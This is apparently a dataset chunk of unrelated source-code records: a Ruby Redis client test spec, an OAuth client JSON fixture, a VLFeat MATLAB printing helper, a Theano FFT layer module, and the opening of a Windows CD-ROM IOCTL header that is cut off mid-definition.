@r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.type('set') { |r| r.should == \"set\" }\n @r.scard('set') { |r| r.should == 2 }\n @r.sismember('set', 'key1') { |r| r.should == true }\n @r.sismember('set', 'key2') { |r| r.should == true }\n @r.sismember('set', 'notthere') { |r| r.should == false; done }\n end\n #\n it \"should be able to do set intersection (SINTER)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.sadd \"set2\", 'key2'\n @r.sinter('set', 'set2') { |r| r.should == ['key2']; done }\n end\n #\n it \"should be able to do set intersection and store the results in a key (SINTERSTORE)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.sadd \"set2\", 'key2'\n @r.sinterstore('newone', 'set', 'set2') { |r| r.should == 1 }\n @r.smembers('newone') { |r| r.should == ['key2']; done }\n end\n #\n it \"should be able to do set union (SUNION)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.sadd \"set2\", 'key2'\n @r.sadd \"set2\", 'key3'\n @r.sunion('set', 'set2') { |r| r.sort.should == ['key1','key2','key3'].sort; done }\n end\n #\n it \"should be able to do set union and store the results in a key (SUNIONSTORE)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.sadd \"set2\", 'key2'\n @r.sadd \"set2\", 'key3'\n @r.sunionstore('newone', 'set', 'set2') { |r| r.should == 3 }\n @r.smembers('newone') { |r| r.sort.should == ['key1','key2','key3'].sort; done }\n end\n #\n it \"should be able to do set difference (SDIFF)\" do\n @r.sadd \"set\", 'a'\n @r.sadd \"set\", 'b'\n @r.sadd \"set2\", 'b'\n @r.sadd \"set2\", 'c'\n @r.sdiff('set', 'set2') { |r| r.should == ['a']; done }\n end\n #\n it \"should be able to do set difference and store the results in a key (SDIFFSTORE)\" do\n @r.sadd \"set\", 'a'\n @r.sadd \"set\", 'b'\n @r.sadd \"set2\", 'b'\n @r.sadd \"set2\", 'c'\n @r.sdiffstore('newone', 'set', 'set2')\n @r.smembers('newone') { |r| r.should == ['a']; done }\n end\n #\n it \"should be able move elements from one set to another (SMOVE)\" do\n @r.sadd 'set1', 'a'\n @r.sadd 'set1', 'b'\n @r.sadd 'set2', 'x'\n @r.smove('set1', 'set2', 'a') { |r| r.should == true }\n @r.sismember('set2', 'a') { |r| r.should == true }\n @r.delete('set1') { done }\n end\n #\n it \"should be able to do crazy SORT queries\" do\n # The 'Dogs' is capitialized on purpose\n @r['dog_1'] = 'louie'\n @r.rpush 'Dogs', 1\n @r['dog_2'] = 'lucy'\n @r.rpush 'Dogs', 2\n @r['dog_3'] = 'max'\n @r.rpush 'Dogs', 3\n @r['dog_4'] = 'taj'\n @r.rpush 'Dogs', 4\n @r.sort('Dogs', :get => 'dog_*', :limit => [0,1]) { |r| r.should == ['louie'] }\n @r.sort('Dogs', :get => 'dog_*', :limit => [0,1], :order => 'desc alpha') { |r| r.should == ['taj'] }\n @r.ping { done }\n end\n\n it \"should be able to handle array of :get using SORT\" do\n @r['dog:1:name'] = 'louie'\n @r['dog:1:breed'] = 'mutt'\n @r.rpush 'dogs', 1\n @r['dog:2:name'] = 'lucy'\n @r['dog:2:breed'] = 'poodle'\n @r.rpush 'dogs', 2\n @r['dog:3:name'] = 'max'\n @r['dog:3:breed'] = 'hound'\n @r.rpush 'dogs', 3\n @r['dog:4:name'] = 'taj'\n @r['dog:4:breed'] = 'terrier'\n @r.rpush 'dogs', 4\n @r.sort('dogs', :get => ['dog:*:name', 'dog:*:breed'], :limit => [0,1]) { |r| r.should == ['louie', 'mutt'] }\n @r.sort('dogs', :get => ['dog:*:name', 'dog:*:breed'], :limit => [0,1], :order => 'desc alpha') { |r| r.should == ['taj', 'terrier'] }\n @r.ping { done }\n end\n #\n it \"should be able count the members of a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.zset_add 'zset', 1, 'set'\n @r.zset_count('zset') { |r| r.should == 1 }\n @r.delete('set')\n @r.delete('zset') { done }\n end\n # \n it \"should be able add members to a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.zset_add 'zset', 1, 'set'\n @r.zset_range('zset', 0, 1) { |r| r.should == ['set'] }\n @r.zset_count('zset') { |r| r.should == 1 }\n @r.delete('set')\n @r.delete('zset') { done }\n end\n # \n it \"should be able delete members to a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.type?('set') { |r| r.should == \"set\" }\n @r.set_add \"set2\", 'key3'\n @r.set_add \"set2\", 'key4'\n @r.type?('set2') { |r| r.should == \"set\" }\n @r.zset_add 'zset', 1, 'set'\n @r.zset_count('zset') { |r| r.should == 1 }\n @r.zset_add 'zset', 2, 'set2'\n @r.zset_count('zset') { |r| r.should == 2 }\n @r.zset_delete 'zset', 'set'\n @r.zset_count('zset') { |r| r.should == 1 }\n @r.delete('set')\n @r.delete('set2')\n @r.delete('zset') { done }\n end\n # \n it \"should be able to get a range of values from a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.set_add \"set2\", 'key3'\n @r.set_add \"set2\", 'key4'\n @r.set_add \"set3\", 'key1'\n @r.type?('set') { |r| r.should == 'set' }\n @r.type?('set2') { |r| r.should == 'set' }\n @r.type?('set3') { |r| r.should == 'set' }\n @r.zset_add 'zset', 1, 'set'\n @r.zset_add 'zset', 2, 'set2'\n @r.zset_add 'zset', 3, 'set3'\n @r.zset_count('zset') { |r| r.should == 3 }\n @r.zset_range('zset', 0, 3) { |r| r.should == ['set', 'set2', 'set3'] }\n @r.delete('set')\n @r.delete('set2')\n @r.delete('set3')\n @r.delete('zset') { done }\n end\n # \n it \"should be able to get a reverse range of values from a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.set_add \"set2\", 'key3'\n @r.set_add \"set2\", 'key4'\n @r.set_add \"set3\", 'key1'\n @r.type?('set') { |r| r.should == 'set' }\n @r.type?('set2') { |r| r.should == 'set' }\n @r.type?('set3') { |r| r.should == 'set' }\n @r.zset_add 'zset', 1, 'set'\n @r.zset_add 'zset', 2, 'set2'\n @r.zset_add 'zset', 3, 'set3'\n @r.zset_count('zset') { |r| r.should == 3 }\n @r.zset_reverse_range('zset', 0, 3) { |r| r.should == ['set3', 'set2', 'set'] }\n @r.delete('set')\n @r.delete('set2')\n @r.delete('set3')\n @r.delete('zset') { done }\n end\n # \n it \"should be able to get a range by score of values from a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.set_add \"set2\", 'key3'\n @r.set_add \"set2\", 'key4'\n @r.set_add \"set3\", 'key1'\n @r.set_add \"set4\", 'key4'\n @r.zset_add 'zset', 1, 'set'\n @r.zset_add 'zset', 2, 'set2'\n @r.zset_add 'zset', 3, 'set3'\n @r.zset_add 'zset', 4, 'set4'\n @r.zset_count('zset') { |r| r.should == 4 }\n @r.zset_range_by_score('zset', 2, 3) { |r| r.should == ['set2', 'set3'] }\n @r.delete('set')\n @r.delete('set2')\n @r.delete('set3')\n @r.delete('set4')\n @r.delete('zset') { done }\n end\n #\n it \"should be able to get a score for a specific value in a zset (ZSCORE)\" do\n @r.zset_add \"zset\", 23, \"value\"\n @r.zset_score(\"zset\", \"value\") { |r| r.should == \"23\" }\n\n @r.zset_score(\"zset\", \"value2\") { |r| r.should == nil }\n @r.zset_score(\"unknown_zset\", \"value\") { |r| r.should == nil }\n\n @r.delete(\"zset\") { done }\n end\n #\n it \"should be able to increment a range score of a zset (ZINCRBY)\" do\n # create a new zset\n @r.zset_increment_by \"hackers\", 1965, \"Yukihiro Matsumoto\"\n @r.zset_score(\"hackers\", \"Yukihiro Matsumoto\") { |r| r.should == \"1965\" }\n\n # add a new element\n @r.zset_increment_by \"hackers\", 1912, \"Alan Turing\"\n @r.zset_score(\"hackers\", \"Alan Turing\") { |r| r.should == \"1912\" }\n\n # update the score\n @r.zset_increment_by \"hackers\", 100, \"Alan Turing\" # yeah, we are making Turing a bit younger\n @r.zset_score(\"hackers\", \"Alan Turing\") { |r| r.should == \"2012\" }\n\n # attempt to update a key that's not a zset\n @r[\"i_am_not_a_zet\"] = \"value\"\n # shouldn't raise error anymore\n @r.zset_incr_by(\"i_am_not_a_zet\", 23, \"element\") { |r| r.should == nil }\n\n @r.delete(\"hackers\")\n @r.delete(\"i_am_not_a_zet\") { done }\n end\n #\n it \"should provide info (INFO)\" do\n @r.info do |r|\n [:last_save_time, :redis_version, :total_connections_received, :connected_clients, :total_commands_processed, :connected_slaves, :uptime_in_seconds, :used_memory, :uptime_in_days, :changes_since_last_save].each do |x|\n r.keys.include?(x).should == true\n end\n done\n end\n end\n #\n it \"should be able to flush the database (FLUSHDB)\" do\n @r['key1'] = 'keyone'\n @r['key2'] = 'keytwo'\n @r.keys('*') { |r| r.sort.should == ['foo', 'key1', 'key2'].sort } #foo from before\n @r.flushdb\n @r.keys('*') { |r| r.should == []; done }\n end\n #\n it \"should be able to SELECT database\" do\n @r.select(15)\n @r.get('foo') { |r| r.should == nil; done }\n end\n #\n it \"should be able to provide the last save time (LASTSAVE)\" do\n @r.lastsave do |savetime|\n Time.at(savetime).class.should == Time\n Time.at(savetime).should <= Time.now\n done\n end\n end\n\n it \"should be able to MGET keys\" do\n @r['foo'] = 1000\n @r['bar'] = 2000\n @r.mget('foo', 'bar') { |r| r.should == ['1000', '2000'] }\n @r.mget('foo', 'bar', 'baz') { |r| r.should == ['1000', '2000', nil] }\n @r.ping { done }\n end\n\n it \"should be able to mapped MGET keys\" do\n @r['foo'] = 1000\n @r['bar'] = 2000\n @r.mapped_mget('foo', 'bar') { |r| r.should == { 'foo' => '1000', 'bar' => '2000'} }\n @r.mapped_mget('foo', 'baz', 'bar') { |r| r.should == { 'foo' => '1000', 'bar' => '2000'} }\n @r.ping { done }\n end\n\n it \"should be able to MSET values\" do\n @r.mset :key1 => \"value1\", :key2 => \"value2\"\n @r.get('key1') { |r| r.should == \"value1\" }\n @r.get('key2') { |r| r.should == \"value2\"; done }\n end\n\n it \"should be able to MSETNX values\" do\n @r.msetnx :keynx1 => \"valuenx1\", :keynx2 => \"valuenx2\"\n @r.mget('keynx1', 'keynx2') { |r| r.should == [\"valuenx1\", \"valuenx2\"] }\n\n @r[\"keynx1\"] = \"value1\"\n @r[\"keynx2\"] = \"value2\"\n @r.msetnx :keynx1 => \"valuenx1\", :keynx2 => \"valuenx2\"\n @r.mget('keynx1', 'keynx2') { |r| r.should == [\"value1\", \"value2\"]; done }\n end\n\n it \"should bgsave\" do\n @r.bgsave do |r|\n ['OK', 'Background saving started'].include?(r).should == true\n done\n end\n end\n\n it \"should be able to ECHO\" do\n @r.echo(\"message in a bottle\\n\") { |r| r.should == \"message in a bottle\\n\"; done }\n end\n\n # Tests are disabled due uncatchable exceptions. We should use on_error callback,\n # intead of raising exceptions in random places.\n #\n # it \"should raise error when invoke MONITOR\" do\n # # lambda { @r.monitor }.should.raise\n # done\n # end\n # \n # it \"should raise error when invoke SYNC\" do\n # # lambda { @r.sync }.should.raise\n # done\n # end\n\n it \"should work with 10 commands\" do\n @r.call_commands((1..10).map { |i|\n ['get', \"foo\"]\n }) do |rs|\n rs.length.should == 10\n rs.each { |r| r.should == \"bar\" }\n done\n end\n end\n it \"should work with 1 command\" do\n @r.call_commands([['get', \"foo\"]]) do |rs|\n rs.length.should == 1\n rs[0].should == \"bar\"\n done\n end\n end\n it \"should work with zero commands\" do\n @r.call_commands([]) do |rs|\n rs.should == []\n done\n end\n end\nend\n"} {"text": "[\n {\n \"scope\": [\n \"clients.read\",\n \"clients.write\"\n ],\n \"client_id\": \"14pnUs\",\n \"resource_ids\": [\n \"none\"\n ],\n \"authorized_grant_types\": [\n \"client_credentials\"\n ],\n \"redirect_uri\": [\n \"http*://ant.path.wildcard/**/passback/*\",\n \"http://test1.com\"\n ],\n \"autoapprove\": [\n \"true\"\n ],\n \"authorities\": [\n \"clients.read\",\n \"clients.write\"\n ],\n \"token_salt\": \"erRsWH\",\n \"allowedproviders\": [\n \"uaa\",\n \"ldap\",\n \"my-saml-provider\"\n ],\n \"name\": \"My Client Name\",\n \"lastModified\": 1468364444218\n },\n {\n \"scope\": [\n \"clients.read\",\n \"clients.write\"\n ],\n \"client_id\": \"0Tgnfy\",\n \"resource_ids\": [\n \"none\"\n ],\n \"authorized_grant_types\": [\n \"client_credentials\"\n ],\n \"redirect_uri\": [\n \"http*://ant.path.wildcard/**/passback/*\",\n \"http://test1.com\"\n ],\n \"autoapprove\": [\n \"true\"\n ],\n \"authorities\": [\n \"clients.read\",\n \"new.authority\",\n \"clients.write\"\n ],\n \"token_salt\": \"4wMTwN\",\n \"allowedproviders\": [\n \"uaa\",\n \"ldap\",\n \"my-saml-provider\"\n ],\n \"name\": \"My Client Name\",\n \"lastModified\": 1468364444318\n }\n]"} {"text": "function vl_demo_print(varargin)\n% VL_DEMO_PRINT\n% VL_DEMO_PRINT(NAME) prints the current figure to the documentation\n% directory with the specified filename, assuming that the global\n% variable VL_DEMO_PRINT is defined and non-empty when MATLAB is\n% started (our using SETENV() from MATLAB). Otherwise the function\n% flushes the displays and returns.\n%\n% VL_DEMO_PRINT(NAME, R) specifies a magnification factor R, setting\n% the figure width relatively to the page width. If not specified, R\n% is assumed to be 1/2.\n%\n% Remarks:: The figure paper type is set to letter, that has size 8.5 x\n% 11 inches. When converted for web viewing, images are rasterized\n% at either 75 or 95 DPI, The documentation system converts images\n% to bitmap with a resolution of 75 DPI, which makes a letter size\n% page 637 or 808 pixels large, repsectively.\n%\n% In MATLAB font sizes are usually expressed in points, where a\n% point is a 1/72 inch. Thus a 12pt font sampled at 75 DPI is\n% about 12.5 pixels high.\n\n% Copyright (C) 2007-12 Andrea Vedaldi and Brian Fulkerson.\n% All rights reserved.\n%\n% This file is part of the VLFeat library and is made available under\n% the terms of the BSD license (see the COPYING file).\n\nif isempty(getenv('VL_DEMO_PRINT'))\n drawnow ;\n return ;\nend\n\nif isa(varargin{1}, 'double')\n fig = varargin{1} ;\n varargin(1) = [] ;\nelse\n fig = gcf ;\nend\n\nname = varargin{1} ;\n\nif length(varargin) < 2\n figurePaperSize = 0.5 ;\nelse\n figurePaperSize = varargin{2} ;\nend\n\nvl_printsize(fig, figurePaperSize) ;\n\nfigDir = fullfile(vl_root,'doc','demo') ;\nif ~ exist(figDir, 'dir')\n mkdir(figDir) ;\nend\n\nif 0\n filePath = fullfile(figDir, [name '.eps']) ;\n print(fig, '-depsc2', filePath) ;\nelse\n filePath = fullfile(figDir, [name '.jpg']) ;\n print(fig, '-djpeg95', filePath, '-r95') ;\nend\nfprintf('%s: wrote file ''%s''\\n', mfilename, filePath) ;\n"} {"text": "import numpy as np\nimport theano\nimport theano.tensor as T\nfrom utils.mymath import fourier_matrix, inverse_fourier_matrix\nfrom lasagne.layers import Layer\n\n# Ugly but works for now\ntry:\n import pygpu\n import pycuda.driver\n import skcuda\n from skcuda import fft\n cufft_available = True\nexcept ImportError:\n cufft_available = False\n\nif theano.config.device == 'cuda' and cufft_available:\n from cascadenet.network.theano_extensions.gpuarray.fft2 import cufft2 as fft2g\n from cascadenet.network.theano_extensions.gpuarray.fft2 import cuifft2 as ifft2g\n use_cuda = True\n print \"Using GPU version of fft layers\"\nelse:\n from cascadenet.network.theano_extensions.fft2_lasagne import fft2, ifft2\n use_cuda = False\n print \"Using CPU version of fft layers\"\n\n\nfrom cascadenet.network.theano_extensions.fft_helper import fftshift, ifftshift\nfrom cascadenet.network.theano_extensions.fft import fft, ifft\n\n\nclass FFTLayer(Layer):\n def __init__(self, incoming, data_shape, inv=False, **kwargs):\n '''\n Need to take input shape of the fft, since it needs to\n precompute fft matrix\n '''\n super(FFTLayer, self).__init__(incoming, **kwargs)\n self.data_shape = data_shape\n n, _, nx, ny = data_shape\n # create matrix which performs fft\n\n if inv:\n fourier_mat = inverse_fourier_matrix(nx, ny)\n else:\n fourier_mat = fourier_matrix(nx, ny)\n\n self.real_fft = np.real(fourier_mat)\n self.complex_fft = np.imag(fourier_mat)\n\n def transform(self, input):\n '''\n Perform fourier transform using Fourier matrix\n\n Parameters\n ------------------------------\n input must be of 4d tensor\n with shape [n, 2, nx, ny] where [nx, ny] == self.data_shape. n means\n number of data. 2 means channels for real and complex part of the input\n (channel 1 == real, channel 2 = complex)\n uses real values to simulate the complex operation\n\n Returns\n ------------------------------\n tensor of the shape [n, 2, nx, ny] which is equivalent to\n fourier transform\n\n '''\n in_r = input[0]\n in_c = input[1]\n real_fft = self.real_fft\n complex_fft = self.complex_fft\n out_r = T.dot(real_fft, in_r) - T.dot(complex_fft, in_c)\n out_c = T.dot(complex_fft, in_r) + T.dot(real_fft, in_c)\n return T.stack([out_r, out_c])\n\n def get_output_for(self, input, **kwargs):\n '''\n Computes FFT. Input layer must have dimension [n, 2, nx, ny]\n '''\n out, updates = theano.scan(self.transform, sequences=input)\n return out\n\n\nclass FFT2CPULayer(Layer):\n def __init__(self, incoming, data_shape, inv=False,\n norm='ortho', **kwargs):\n '''\n Need to take input shape of the fft,\n since it needs to precompute fft matrix\n\n if nx != ny, we need to matrices\n\n '''\n super(FFT2Layer, self).__init__(incoming, **kwargs)\n self.fn = fft2 if not inv else ifft2\n self.norm = norm\n\n def get_output_for(self, input, **kwargs):\n '''\n Computes 2D FFT. Input layer must have dimension (n, 2, nx, ny[, nt])\n '''\n return self.fn(input, norm=self.norm)\n\n\nclass FFT2GPULayer(Layer):\n def __init__(self, incoming, data_shape, inv=False,\n norm='ortho', **kwargs):\n '''\n Need to take input shape of the fft,\n since it needs to precompute fft matrix\n\n if nx != ny, we need to matrices\n\n '''\n super(FFT2Layer, self).__init__(incoming, **kwargs)\n self.fn = fft2g if not inv else ifft2g\n self.is_3d = len(data_shape) == 5\n self.norm = norm\n\n def get_output_for(self, input, **kwargs):\n '''\n Computes 2D FFT. Input layer must have dimension (n, 2, nx, ny[, nt])\n '''\n if self.is_3d:\n input_fft = input.dimshuffle((0, 4, 2, 3, 1))\n res = self.fn(input_fft, norm=self.norm)\n return res.dimshuffle((0, 4, 2, 3, 1))\n else:\n input_fft = input.dimshuffle((0, 2, 3, 1))\n res = self.fn(input_fft, norm=self.norm)\n return res.dimshuffle((0, 3, 1, 2))\n\n\nclass FT2Layer(Layer):\n def __init__(self, incoming, data_shape, inv=False, **kwargs):\n '''\n Need to take input shape of the fft,\n since it needs to precompute fft matrix\n\n if nx != ny, we need to matrices\n\n '''\n super(FFT2Layer, self).__init__(incoming, **kwargs)\n self.is_3d = len(data_shape) == 5\n self.data_shape = data_shape\n if self.is_3d:\n n, _, nx, ny, nt = data_shape\n else:\n n, _, nx, ny = data_shape\n # create matrix which performs fft\n\n if inv:\n fourier_mat_x = inverse_fourier_matrix(nx, nx)\n fourier_mat_y = inverse_fourier_matrix(ny, ny) if nx != ny else fourier_mat_x\n else:\n fourier_mat_x = fourier_matrix(nx, nx)\n fourier_mat_y = fourier_matrix(ny, ny) if nx != ny else fourier_mat_x\n\n self.real_fft_x = np.real(fourier_mat_x).astype(theano.config.floatX)\n self.complex_fft_x = np.imag(fourier_mat_x).astype(theano.config.floatX)\n self.real_fft_y = np.real(fourier_mat_y).astype(theano.config.floatX)\n self.complex_fft_y = np.imag(fourier_mat_y).astype(theano.config.floatX)\n\n def transform(self, input):\n '''\n Perform fourier transform using Fourier matrix\n\n Parameters\n ------------------------------\n input must be of 4d tensor\n with shape [n, 2, nx, ny] where [nx, ny] == self.data_shape. n means\n number of data. 2 means channels for real and complex part of the input\n (channel 1 == real, channel 2 = complex)\n uses real values to simulate the complex operation\n\n Returns\n ------------------------------\n tensor of the shape [n, 2, nx, ny] which is equivalent to fourier\n transform\n '''\n u = input[0]\n v = input[1]\n real_fft_x = self.real_fft_x\n complex_fft_x = self.complex_fft_x\n real_fft_y = self.real_fft_y\n complex_fft_y = self.complex_fft_y\n\n out_u = T.dot(u, real_fft_y.T) - T.dot(v, complex_fft_y.T)\n out_v = T.dot(u, complex_fft_y.T) + T.dot(v, real_fft_y.T)\n out_u2 = T.dot(real_fft_x, out_u) - T.dot(complex_fft_x, out_v)\n out_v2 = T.dot(complex_fft_x, out_u) + T.dot(real_fft_x, out_v)\n\n return T.stack([out_u2, out_v2])\n\n def get_output_for(self, input, **kwargs):\n '''\n Computes 2D FFT. Input layer must have dimension [n, 2, nx, ny]\n '''\n if self.is_3d:\n\n n, nc, nx, ny, nt = self.data_shape\n lin = T.transpose(input, axes=(0, 4, 1, 2, 3))\n lin = lin.reshape((-1, nc, nx, ny))\n lout, updates = theano.scan(self.transform, sequences=lin)\n lout = lout.reshape((-1, nt, nc, nx, ny))\n out = T.transpose(lout, axes=(0, 2, 3, 4, 1))\n return out\n\n # def loop_over_n(i, arr):\n # out, updates = theano.scan(self.transform,\n # sequences=arr[:, :, i])[0]\n # return out\n\n # nt = self.data_shape[-1]\n # out, updates = theano.scan(loop_over_n,\n # non_sequences=input,\n # sequences=xrange(nt))\n # return out\n\n out, updates = theano.scan(self.transform, sequences=input)\n return out\n\n\nclass FFTCLayer(Layer):\n def __init__(self, incoming, data_shape, norm=None,\n inv=False, **kwargs):\n '''\n\n Assumes data is in the format of (n, 2, nx, ny[, nt])\n\n Applies FFTC along the last axis\n\n '''\n super(FFTCLayer, self).__init__(incoming, **kwargs)\n self.fn = fft if not inv else ifft\n self.is_3d = len(data_shape) == 5\n self.norm = norm\n # if isinstance(axes, int):\n # axes = (axes,)\n\n # # Note that because we are simulating complex number, with 2 channels,\n # # we need to be careful when we invoke axes=(-1) and so we need to make\n # # sure we fix all -n to -n-1.\n # axes_list = []\n # for ax in axes:\n # if ax < 0:\n # axes_list.append(ax-1)\n # else:\n # axes_list.append(ax)\n # axes = tuple(axes_list)\n # print(axes)\n\n # self.axes = axes\n\n def get_output_for(self, input, **kwargs):\n '''\n Computes FFTC. Input layer must have dimension\n '''\n if self.is_3d:\n # Convert to (n, nx, ny[, nt], 2) for fft\n tmp = input.dimshuffle((0, 2, 3, 4, 1))\n tmp_shifted = ifftshift(tmp, axes=(-2,))\n tmp_tfx_shifted = self.fn(tmp_shifted, norm=self.norm)\n tmp_tfx = fftshift(tmp_tfx_shifted, axes=(-2,))\n # Convert back to (n, 2, nx, ny[, nt])\n return tmp_tfx.dimshuffle((0, 4, 1, 2, 3))\n\n else:\n # shape: [n, nc, nx, nt]\n tmp = input.dimshuffle((0, 2, 3, 1))\n data_xf = ifftshift(tmp, axes=(-2,))\n data_xt = self.fn(data_xf, norm=self.norm)\n data_xt = fftshift(data_xt, axes=(-2,))\n return data_xt.dimshuffle((0, 3, 1, 2))\n\nif use_cuda:\n FFT2Layer = FFT2GPULayer\nelse:\n # FFT2Layer = FT2Layer\n FFT2Layer = FFT2CPULayer\n\n# def FT2Layer(incoming, data_shape):\n# net = FFTLayer(incoming, data_shape)\n# net = TransposeLayer(net)\n# net = FFTLayer(net, data_shape)\n# net = TransposeLayer(net)\n# return net\n\n\n# def IFT2Layer(incoming, data_shape):\n# net = FFTLayer(incoming, data_shape, inv=True)\n# net = TransposeLayer(net)\n# net = FFTLayer(net, data_shape, inv=True)\n# net = TransposeLayer(net)\n# return net\n\n\n# def fftshift(x):\n# return x\n\n\n# def ifftshift(x):\n# return x\n\n"} {"text": "/*\n * ntddcdrm.h\n *\n * CDROM IOCTL interface.\n *\n * This file is part of the w32api package.\n *\n * Contributors:\n * Created by Casper S. Hornstrup \n *\n * THIS SOFTWARE IS NOT COPYRIGHTED\n *\n * This source code is offered for use in the public domain. You may\n * use, modify or distribute it freely.\n *\n * This code is distributed in the hope that it will be useful but\n * WITHOUT ANY WARRANTY. ALL WARRANTIES, EXPRESS OR IMPLIED ARE HEREBY\n * DISCLAIMED. This includes but is not limited to warranties of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n *\n */\n\n#ifndef _NTDDCDRM_\n#define _NTDDCDRM_\n\n#include \"ntddstor.h\"\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#define IOCTL_CDROM_BASE FILE_DEVICE_CD_ROM\n\n#define IOCTL_CDROM_CHECK_VERIFY \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0200, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_FIND_NEW_DEVICES \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0206, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_CONFIGURATION \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0016, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_CONTROL \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x000D, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_DRIVE_GEOMETRY \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0013, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_DRIVE_GEOMETRY_EX \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0014, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_LAST_SESSION \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x000E, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_VOLUME \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0005, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_PAUSE_AUDIO \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0003, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_PLAY_AUDIO_MSF \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0006, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_RAW_READ \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x000F, METHOD_OUT_DIRECT, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_DISK_TYPE \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0010, METHOD_BUFFERED, FILE_ANY_ACCESS)\n\n#define IOCTL_CDROM_READ_Q_CHANNEL \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x000B, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_READ_TOC \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0000, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_READ_TOC_EX \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0015, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_RESUME_AUDIO \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0004, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_SEEK_AUDIO_MSF \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0001, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_SET_VOLUME \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x000A, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_SIMBAD \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x1003, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_STOP_AUDIO \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0002, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n\n#define MAXIMUM_NUMBER_TRACKS 100\n#define MAXIMUM_CDROM_SIZE 804\n#define MINIMUM_CDROM_READ_TOC_EX_SIZE 2\n\ntypedef struct _TRACK_DATA {\n UCHAR Reserved;\n UCHAR Control : 4;\n UCHAR Adr : 4;\n UCHAR TrackNumber;\n UCHAR Reserved1;\n UCHAR Address[4];\n} TRACK_DATA, *PTRACK_DATA;\n\n/* CDROM_DISK_DATA.DiskData flags */\n#define CDROM_DISK_AUDIO_TRACK 0x00000001\n#define CDROM_DISK_DATA_TRACK 0x00000002\n\ntypedef struct _CDROM_DISK_DATA {\n ULONG DiskData;\n} CDROM_DISK_DATA, *PCDROM_DISK_DATA;\n\ntypedef struct _CDROM_PLAY_AUDIO_MSF {\n UCHAR StartingM;\n UCHAR StartingS;\n UCHAR StartingF;\n UCHAR EndingM;\n UCHAR EndingS;\n UCHAR EndingF;\n} CDROM_PLAY_AUDIO_MSF, *PCDROM_PLAY_AUDIO_MSF;\n\n/* CDROM_READ_TOC_EX.Format constants */\n#define CDROM_READ_TOC_EX_FORMAT_TOC 0x00\n#define CDROM_READ_TOC_EX_FORMAT_SESSION 0x01\n#define CDROM_READ_TOC_EX_FORMAT_FULL_TOC 0x02\n#define CDROM_READ_TOC_EX_FORMAT_PMA 0x03\n#define CDROM_READ_TOC_EX_FORMAT_ATIP 0x04\n#define CDROM_READ_TOC_EX_FORMAT_CDTEXT 0x05\n\ntypedef struct _CDROM_READ_TOC_EX {\n UCHAR Format : 4;\n UCHAR Reserved1 : 3;\n UCHAR Msf : 1;\n UCHAR SessionTrack;\n UCHAR Reserved2;\n UCHAR Reserved3;\n} CDROM_READ_TOC_EX, *PCDROM_READ_TOC_EX;\n\ntypedef struct _CDROM_SEEK_AUDIO_MSF {\n UCHAR M;\n UCHAR S;\n UCHAR F;\n} CDROM_SEEK_AUDIO_MSF, *PCDROM_SEEK_AUDIO_MSF;\n\n/* CDROM_SUB_Q_DATA_FORMAT.Format constants */\n#define IOCTL_CDROM_SUB_Q_CHANNEL 0x00\n#define IOCTL_CDROM_CURRENT_POSITION 0x01\n#define IOCTL_CDROM_MEDIA_CATALOG 